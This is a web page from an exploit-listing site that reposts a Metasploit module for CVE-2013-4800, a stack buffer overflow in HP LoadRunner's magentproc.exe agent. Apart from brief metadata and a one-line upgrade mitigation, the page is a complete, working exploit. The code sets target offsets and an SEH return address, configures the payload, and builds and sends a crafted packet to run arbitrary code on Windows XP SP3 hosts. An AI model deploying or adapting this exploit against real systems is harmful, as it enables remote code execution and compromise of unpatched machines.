Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
HP LoadRunner magentproc.exe Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
HP LoadRunner
by:
Unknown, juan vazquez
7.5
CVSS
HIGH
Stack Buffer Overflow
CWE
Product Name: HP LoadRunner
Affected Version From: Before 11.52
Affected Version To: 11.52
Patch Exists: YES
Related CWE: CVE-2013-4800
CPE: a:hp:loadrunner
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
Unknown

HP LoadRunner magentproc.exe Overflow

This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.

Mitigation:

Upgrade to version 11.52 or later
Source

Exploit-DB raw data:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP LoadRunner magentproc.exe Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
        vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
        a specially crafted packet, an attacker may be able to execute arbitrary code.
      },
      'Author'         =>
        [
          'Unknown', # Original discovery # From Tenable Network Security
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-4800'],
          ['OSVDB', '95644'],
          ['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'SSL' => true,
          'SSLVersion' => 'SSL3',
          'PrependMigrate' => true
        },
      'Payload'        =>
        {
          'Space'    => 4096,
          'DisableNops' => true,
          'BadChars' => "\x00",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Platform'       => 'win',
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          [
            'Windows XP SP3 / HP LoadRunner 11.50',
            {
              # magentproc.exe 11.50.2042.0
              'Offset' => 1104,
              'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
              'Crash' => 6000 # Length needed to ensure an exception
            }
          ]
        ],
      'DisclosureDate' => 'Jul 27 2013'))

      register_options([Opt::RPORT(443)], self.class)
  end

  def exploit

    req = [0xffffffff].pack("N") # Fake Length
    req << rand_text(target['Offset'])
    req << generate_seh_record(target.ret)
    req << payload.encoded
    req << rand_text(target['Crash'])

    connect
    print_status("Sending malicious request...")
    sock.put(req)
    disconnect

  end
end

Navigation

Suggest Exploit

Services By CQR